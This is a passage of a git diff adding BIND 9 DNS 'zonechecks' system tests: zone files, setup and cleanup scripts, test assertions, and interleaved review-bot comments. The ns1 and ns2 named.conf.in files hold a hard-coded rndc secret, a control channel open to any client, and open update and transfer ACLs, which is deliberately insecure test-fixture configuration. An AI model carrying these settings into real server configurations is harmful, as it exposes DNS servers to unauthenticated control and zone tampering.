+ + retry_quiet "$timeout" wait_for_pid "$pid1" "$pid2" "$pid3" "$pid4" "$pid5" "$pid6" || ret=1 + kill -TERM "$pid1" "$pid2" "$pid3" "$pid4" "$pid5" "$pid6" 2>/dev/null + + wait "$pid1" || ret=1 + wait "$pid2" || ret=1 + wait "$pid3" || ret=1 + wait "$pid4" || ret=1 + wait "$pid5" || ret=1 + wait "$pid6" || ret=1 + + grep "status: SERVFAIL" "dig.out$i.1.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.2.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.3.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.4.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.5.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.6.test$n" > /dev/null && ret=1 + [ $ret = 1 ] && break + i=$((i+1)) + echo_i "successfully completed pass $i of $passes" +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +repeat_query() ( + i=0 + while [ "$i" -lt "$1" ]; do + dig_with_opts +short "@$2" "$3" | tee "dig.out$i.test$n" || return 1 + i=$((i+1)) + done +) + +count_unique() ( + repeat_query "$@" | sort -u | wc -l +) + +n=$((n+1)) +echo_i "check repeated recursive lookups of non recurring TTL=0 responses get new values ($n)" +ret=0 +repeats=9 +count=$(count_unique "$repeats" 10.53.0.3 foo.increment) +if [ "$count" -ne "$repeats" ] ; then echo_i "failed (count=$count, repeats=$repeats)"; ret=1; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check lookups against TTL=1 records ($n)" +i=0 +passes=10 +ret=0 +while [ $i -lt $passes ] +do + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.1.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.2.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.3.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.4.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.5.test$n" || ret=1 + dig_with_opts @10.53.0.3 www.one.tld > "dig.out$i.6.test$n" || ret=1 + grep "status: SERVFAIL" 
"dig.out$i.1.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.2.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.3.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.4.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.5.test$n" > /dev/null && ret=1 + grep "status: SERVFAIL" "dig.out$i.6.test$n" > /dev/null && ret=1 + [ $ret = 1 ] && break + i=$((i+1)) + echo_i "successfully completed pass $i of $passes" + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/zonechecks/a.db b/bin/tests/system/zonechecks/a.db new file mode 100644 index 0000000..62d1ee7 --- /dev/null +++ b/bin/tests/system/zonechecks/a.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600 +@ 3600 IN NS 127.0.0.1 +127.0.0.1 3600 IN A 127.0.0.1 diff --git a/bin/tests/system/zonechecks/aaaa.db b/bin/tests/system/zonechecks/aaaa.db new file mode 100644 index 0000000..75724d6 --- /dev/null +++ b/bin/tests/system/zonechecks/aaaa.db 
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600
+@ 3600 IN NS ::1
+::1 3600 IN AAAA ::1
diff --git a/bin/tests/system/zonechecks/bigserial.db b/bin/tests/system/zonechecks/bigserial.db
new file mode 100644
index 0000000..200573a
--- /dev/null
+++ b/bin/tests/system/zonechecks/bigserial.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 3003113544 3600 1200 604800 3600
+@ 3600 IN NS ns
+ns 3600 IN A 10.53.0.1
diff --git a/bin/tests/system/zonechecks/clean.sh b/bin/tests/system/zonechecks/clean.sh
new file mode 100644
index 0000000..ed4012a
--- /dev/null
+++ b/bin/tests/system/zonechecks/clean.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f *.out
+rm -f */named.memstats
+rm -f */named.conf
+rm -f */named.run
+rm -f */*.db */*.db.signed */K*.key */K*.private */*.jnl */dsset-*
+rm -f */signer.err
+rm -f rndc.out.*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/zonechecks/cname.db b/bin/tests/system/zonechecks/cname.db
new file mode 100644
index 0000000..2e8a123
--- /dev/null
+++ b/bin/tests/system/zonechecks/cname.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600
+@ 3600 IN NS ns
+ns 3600 IN CNAME @
diff --git a/bin/tests/system/zonechecks/dname.db b/bin/tests/system/zonechecks/dname.db
new file mode 100644
index 0000000..b2859d1
--- /dev/null
+++ b/bin/tests/system/zonechecks/dname.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600
+@ 3600 IN NS ns
+@ 3600 IN DNAME .
diff --git a/bin/tests/system/zonechecks/noaddress.db b/bin/tests/system/zonechecks/noaddress.db
new file mode 100644
index 0000000..f656197
--- /dev/null
+++ b/bin/tests/system/zonechecks/noaddress.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600
+@ 3600 IN NS ns
+ns 3600 IN TXT this name has no address records
diff --git a/bin/tests/system/zonechecks/ns1/named.conf.in b/bin/tests/system/zonechecks/ns1/named.conf.in
new file mode 100644
index 0000000..78f087d
--- /dev/null
+++ b/bin/tests/system/zonechecks/ns1/named.conf.in
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view unused {
+ match-clients { none; };
+
+ zone "duplicate.example" {
+ type primary;
+ file "duplicate.db";
+ };
+};
+
+view primary {
+ match-clients { any; };
+
+ zone "primary.example" {
+ type primary;
+ file "primary.db";
+ allow-update { any; };
+ allow-transfer { any; };
+ auto-dnssec maintain;
+ };
+
+ zone "bigserial.example" {
+ type primary;
+ file "bigserial.db";
+ };
+
+ zone "reload.example" {
+ type primary;
+ file "reload.db";
+ };
+
+ zone "duplicate.example" {
+ type primary;
+ file "duplicate.db";
+ };
+};
diff --git a/bin/tests/system/zonechecks/ns2/named.conf.in b/bin/tests/system/zonechecks/ns2/named.conf.in
new file mode 100644
index 0000000..79e7c18
--- /dev/null
+++ b/bin/tests/system/zonechecks/ns2/named.conf.in
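Review bot: The fixed `rndc_key` secret, the `controls` line with `allow { any; }`, and `allow-update { any; };` / `allow-transfer { any; };` on `primary.example` carry no comment marking them as test-only, so the file reads like a reusable template. A short comment above the `key` block would make the intent explicit, for example `// Test fixture: fixed key and open ACLs are acceptable only on the 10.53.0.x test addresses; do not copy into a production configuration.` The same key and open control channel appear in ns2/named.conf.in and would benefit from the same comment.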
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "primary.example" {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "sec.db";
+};
diff --git a/bin/tests/system/zonechecks/nxdomain.db b/bin/tests/system/zonechecks/nxdomain.db
new file mode 100644
index 0000000..853325d
--- /dev/null
+++ b/bin/tests/system/zonechecks/nxdomain.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns hostmaster 1 3600 1200 604800 3600
+@ 3600 IN NS ns
+; There are no records at all with the ownername of "ns".
diff --git a/bin/tests/system/zonechecks/setup.sh b/bin/tests/system/zonechecks/setup.sh
new file mode 100644
index 0000000..a6cbb6f
--- /dev/null
+++ b/bin/tests/system/zonechecks/setup.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+
+$SHELL ../genzone.sh 1 > ns1/primary.db
+$SHELL ../genzone.sh 1 > ns1/duplicate.db
+cp bigserial.db ns1/
+cd ns1
+touch primary.db.signed
+echo '$INCLUDE "primary.db.signed"' >> primary.db
+$KEYGEN -a ${DEFAULT_ALGORITHM} -q primary.example > /dev/null 2>&1
+$KEYGEN -a ${DEFAULT_ALGORITHM} -qfk primary.example > /dev/null 2>&1
+$SIGNER -SD -o primary.example primary.db > /dev/null \
+ 2> signer.err || cat signer.err
+echo '$INCLUDE "soa.db"' > reload.db
+echo '@ 0 NS .' >> reload.db
+echo '@ 0 SOA . . 1 0 0 0 0' > soa.db
diff --git a/bin/tests/system/zonechecks/tests.sh b/bin/tests/system/zonechecks/tests.sh
new file mode 100644
index 0000000..e2a6879
--- /dev/null
+++ b/bin/tests/system/zonechecks/tests.sh
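Review bot: Both `$KEYGEN` calls discard stdout and stderr and their exit status is never checked, and `$SIGNER ... 2> signer.err || cat signer.err` prints the error but lets setup continue, so a key-generation or signing failure would surface only later as `zonestatus` mismatches in tests.sh. `cd ns1` is unchecked as well, so if it failed the following `touch` and `echo` lines would write into the parent directory. Making these fatal keeps the failure at its cause, e.g. `cd ns1 || exit 1` and `$KEYGEN -a ${DEFAULT_ALGORITHM} -q primary.example > /dev/null || exit 1`, with `|| { cat signer.err; exit 1; }` on the signer line.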
@@ -0,0 +1,257 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +# +echo_i "checking that we detect a NS which refers to a CNAME" +if $CHECKZONE . cname.db > cname.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "is a CNAME" cname.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which is below a DNAME" +if $CHECKZONE . dname.db > dname.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "is below a DNAME" dname.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which has no address records (A/AAAA)" +if $CHECKZONE . noaddress.db > noaddress.out +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "has no address records" noaddress.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which has no records" +if $CHECKZONE . nxdomain.db > nxdomain.out +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "has no address records" noaddress.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a A record (fail)" +if $CHECKZONE -n fail . 
a.db > a.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "appears to be an address" a.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a A record (warn=default)" +if $CHECKZONE . a.db > a.out 2>&1 +then + if grep "appears to be an address" a.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a A record (ignore)" +if $CHECKZONE -n ignore . a.db > a.out 2>&1 +then + if grep "appears to be an address" a.out > /dev/null + then + echo_i "failed (message)"; status=`expr $status + 1` + else + : + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (fail)" +if $CHECKZONE -n fail . aaaa.db > aaaa.out 2>&1 +then + echo_i "failed (status)"; status=`expr $status + 1` +else + if grep "appears to be an address" aaaa.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (warn=default)" +if $CHECKZONE . aaaa.db > aaaa.out 2>&1 +then + if grep "appears to be an address" aaaa.out > /dev/null + then + : + else + echo_i "failed (message)"; status=`expr $status + 1` + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking that we detect a NS which looks like a AAAA record (ignore)" +if $CHECKZONE -n ignore . 
aaaa.db > aaaa.out 2>&1 +then + if grep "appears to be an address" aaaa.out > /dev/null + then + echo_i "failed (message)"; status=`expr $status + 1` + else + : + fi +else + echo_i "failed (status)"; status=`expr $status + 1` +fi + +# +echo_i "checking 'rdnc zonestatus' output" +ret=0 +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.1 zonestatus primary.example > rndc.out.pri 2>&1 + grep "zone not loaded" rndc.out.pri > /dev/null || break + sleep 1 +done +checkfor() { + grep "$1" $2 > /dev/null || { + ret=1; + echo_i "missing string '$1' from '$2'" + } +} +checkfor "name: primary.example" rndc.out.pri +checkfor "type: primary" rndc.out.pri +checkfor "files: primary.db, primary.db.signed" rndc.out.pri +checkfor "serial: " rndc.out.pri +checkfor "nodes: " rndc.out.pri +checkfor "last loaded: " rndc.out.pri +checkfor "secure: yes" rndc.out.pri +checkfor "inline signing: no" rndc.out.pri +checkfor "key maintenance: automatic" rndc.out.pri +checkfor "next key event: " rndc.out.pri +checkfor "next resign node: " rndc.out.pri +checkfor "next resign time: " rndc.out.pri +checkfor "dynamic: yes" rndc.out.pri +checkfor "frozen: no" rndc.out.pri +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.2 zonestatus primary.example > rndc.out.sec 2>&1 + grep "zone not loaded" rndc.out.sec > /dev/null || break + sleep 1 +done +checkfor "name: primary.example" rndc.out.sec +checkfor "type: secondary" rndc.out.sec +checkfor "files: sec.db" rndc.out.sec +checkfor "serial: " rndc.out.sec +checkfor "nodes: " rndc.out.sec +checkfor "next refresh: " rndc.out.sec +checkfor "expires: " rndc.out.sec +checkfor "secure: yes" rndc.out.sec +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.prereload 2>&1 + grep "zone not loaded" rndc.out.prereload > /dev/null || break + sleep 1 +done +checkfor "files: reload.db, soa.db$" rndc.out.prereload +echo "@ 0 SOA . . 
2 0 0 0 0" > ns1/soa.db +$RNDCCMD 10.53.0.1 reload reload.example | sed 's/^/ns1 /' | cat_i +for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS reload.example SOA @10.53.0.1 > dig.out + grep " 2 0 0 0 0" dig.out >/dev/null && break + sleep 1 +done +$RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.postreload 2>&1 +checkfor "files: reload.db, soa.db$" rndc.out.postreload +sleep 1 +echo "@ 0 SOA . . 3 0 0 0 0" > ns1/reload.db +echo "@ 0 NS ." >> ns1/reload.db +rndc_reload ns1 10.53.0.1 reload.example +for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS reload.example SOA @10.53.0.1 > dig.out + grep " 3 0 0 0 0" dig.out >/dev/null && break + sleep 1 +done +$RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.removeinclude 2>&1 +checkfor "files: reload.db$" rndc.out.removeinclude + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking 'rdnc zonestatus' with duplicated zone name" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus duplicate.example > rndc.out.duplicate 2>&1 +checkfor "zone 'duplicate.example' was found in multiple views" rndc.out.duplicate +$RNDCCMD 10.53.0.1 zonestatus duplicate.example in primary > rndc.out.duplicate 2>&1 +checkfor "name: duplicate.example" rndc.out.duplicate +$RNDCCMD 10.53.0.1 zonestatus nosuchzone.example > rndc.out.duplicate 2>&1 +checkfor "no matching zone 'nosuchzone.example' in any view" rndc.out.duplicate +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking 'rdnc zonestatus' with big serial value" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus bigserial.example > rndc.out.bigserial 2>&1 +checkfor "serial: 3003113544" rndc.out.bigserial +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 |
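Review bot: The "NS which has no records" check runs `$CHECKZONE . nxdomain.db > nxdomain.out` but then greps `noaddress.out`, the file written by the previous check, so the message assertion never looks at the nxdomain output. It should read `if grep "has no address records" nxdomain.out > /dev/null`; the expected message text for this case is an assumption to confirm against the checker's actual output. Both this redirect and the `noaddress.out` one also lack the `2>&1` that the other `$CHECKZONE` calls use, so the diagnostic may not be captured if it is written to stderr. Smaller point: the three `echo_i` lines say `rdnc zonestatus` where `rndc` is meant.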